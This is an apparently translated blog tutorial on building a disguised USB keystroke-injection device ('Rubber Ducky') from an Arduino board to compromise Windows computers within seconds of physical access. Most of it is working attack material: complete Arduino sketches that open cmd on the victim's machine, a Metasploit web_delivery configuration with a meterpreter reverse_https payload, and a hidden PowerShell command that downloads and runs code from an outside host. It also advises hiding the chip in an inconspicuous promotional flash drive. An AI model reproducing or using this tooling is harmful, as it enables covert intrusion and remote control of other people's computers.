Hacking computer, for 3 seconds. Making USB Duck from scratch on Arduino
Let's start with the traditional “This material is presented for educational purposes only”. If you use this information to hack HBO and release the next Game of Thrones season for free on YouTube, well ... great. In the sense that I do not encourage such behavior.
If you don't know what a “Rubber Ducky” is (USB Rubber Ducky), this is the device that Hak5 made in the photo. It looks and behaves like an ordinary flash drive, but it can be programmed to enter keyboard keys very quickly. "Duck" is able to crack any system in a few seconds. The only drawback is that you will need physical access to the computer. And it also costs $ 50, which is why I wrote this article.
We use a 5V Adafruit Trinket and a microUSB cable - that’s all we need.
Fortunately, Adafruit provides a library for the keyboard interface via USB, so do it right away
#include. You will need to install the library following this instruction.#include <TrinketKeyboard.h>
We can play with the library to begin with, let's start by initializing the flash drive as an HID device using the begin () method.
#include <TrinketKeyboard.h> void setup () { TrinketKeyboard.begin (); } void loop () { TrinketKeyboard.print ("Help, I am trapped in a computer! \ N"); delay (500); }
Looks good. Now run the commands on the victim’s computer. This can be done by pressing the Windows key by typing cmd, Enter, and then the command itself.
#include <TrinketKeyboard.h> void pressEnter () { TrinketKeyboard.pressKey (0, 0x28); delay (10); TrinketKeyboard.pressKey (0,0); delay (300); } void winRun () { TrinketKeyboard.pressKey (0x08, 0x15); delay (30); TrinketKeyboard.pressKey (0,0); } void setup () { TrinketKeyboard.begin (); delay (1000); winRun (); delay (100); winRun (); delay (300); // Run cmd TrinketKeyboard.print ("cmd"); pressEnter (); delay (500); TrinketKeyboard.print ("ipconfig"); delay (100); pressEnter (); }
Fine. Let's create an exploit in the Metasploit framework.
We will use the module
web_delivery
I chose it because of the high speed and low probability of the antivirus working. He also does not write anything to the disc, so he will not leave any traces at the end of the work.
Here we break the 64-bit Windows 10, so we'll target PowerShell, but keep in mind this will not exploit against PowerShell. We just use the shell to download the necessary files from the server.
use exploit / multi / script / web_delivery
We need to tell our program where to get the binaries from:
set LHOST 1.2.3.4
Then we indicate the port that will not cause suspicion, what about 443? ;)
set LPORT 443
Metasploit generates a random URIPATH each time, and we want to be able to start and stop listening to the port at any time without having to recompile the code for the flash drive.
set URIPATH /
Now you need to choose Powershell as the delivery method. The exploit supports three targets marked with identifiers: these are 0: Python, 1: PHP, and 2: Powershell.
set TARGET 2
Now set the payload. I use reverse_https, because we work on the 443rd port. For most intrusion detection systems, it will look like a regular connection.
set PAYLOAD windows / meterpreter / reverse_https
And finally
exploit
To conveniently stop and resume port listening, create a configuration file: usb.rc.
use exploit / multi / script / web_delivery set LHOST 1.2.3.4 set LPORT 443 set URIPATH / set TARGET 2 set PAYLOAD windows / meterpreter / reverse_https exploit
We get the payload to run on the victim's computer:
powershell.exe -nop -w hidden -c $ N = new-object net.webclient; $ N.proxy = [Net.WebRequest] :: GetSystemWebProxy (); $ N.Proxy.Credentials = [Net.CredentialCache] :: DefaultCredentials; IEX $ N.downloadstring ('http://1.2.3.4:8080/');
Now we can run it from a flash drive.
#include <TrinketKeyboard.h> void pressEnter () { TrinketKeyboard.pressKey (0, 0x28); delay (10); TrinketKeyboard.pressKey (0,0); delay (300); } void winRun () { TrinketKeyboard.pressKey (0x08, 0x15); delay (30); TrinketKeyboard.pressKey (0,0); } void setup () { TrinketKeyboard.begin (); delay (1000); winRun (); delay (100); winRun (); delay (300); // Run cmd TrinketKeyboard.print ("cmd"); pressEnter (); delay (500); TrinketKeyboard.print ("powershell.exe -nop -w hidden -c $ N = new-object net.webclient; $ N.proxy = [Net.WebRequest] :: GetSystemWebProxy (); $ N.Proxy.Credentials = [Net .CredentialCache] :: DefaultCredentials; IEX $ N.downloadstring ('http://1.2.3.4:8080/'); "); delay (100); pressEnter (); } void loop () { // nothing happens after setup }
It works very well. We need about 40 seconds to fuck Daenerys, I mean the victim’s computer.
Due to the limited power of the "duck", the bootloader is not available permanently, as in the usual Arduino, you can download the code only when you press the button on the USB flash drive or during the first 30 seconds of operation. That is, the first 30 seconds after connecting the flash drive, we wait until the code really works, and then another 10 seconds to type and execute the script. It would be very useful to reduce access time by 75%. This good man edited the firmware to skip the bootloader when connected. We took the code and reflashed the flash drive, reloaded the code and so on - everything works. But you can do even better: it would be nice to hide the chip in the case so that it does not cause suspicion.
I chose one of those inconspicuous USB flash drives that millions of distributors give away, and ordered these cool little microUSB OTG adapters - USB A. I had to cut off unnecessary parts of the circuit board to fit in the case, put the OTG adapter into USB A case and glued everything with superglue. It seems to me not suspicious at all, but still 10 seconds is a considerable time, especially when you hide from dragons.
You can also order the Arduino Pro Micro on Amazon for around $ 10. If you have patience, you can even find it on eBay for about $ 3 or $ 4. I didn’t have a large USB stick for the Pro Micro, so I plugged in the OTG adapter, rewound it with electrical tape and calmed down.
We need to change the program a bit, because we use a different library, but it will work as before.
#include "Keyboard.h" void winRun () { Keyboard.press (KEY_LEFT_GUI); Keyboard.press ('r'); delay (30); Keyboard.releaseAll (); delay (100); } void setup () { Keyboard.begin (); delay (2000); winRun (); Keyboard.println ("cmd"); Keyboard.write (KEY_RETURN); delay (500); Keyboard.println ("powershell.exe -nop -w hidden -c $ C = new-object net.webclient; $ C.proxy = [Net.WebRequest] :: GetSystemWebProxy (); $ C.Proxy.Credentials = [Net .CredentialCache] :: DefaultCredentials; IEX $ C.downloadstring ('http://1.2.3.4:8080/'); "); Keyboard.write (KEY_RETURN); } void loop () { // put your main code here, to run repeatedly: }
The biggest advantage of Pro Micro is its speed. Now we need only 3 seconds of physical access. A real attack on the go. If you intend to use this force, do it for a good cause. Kill Cersei.
Commentaires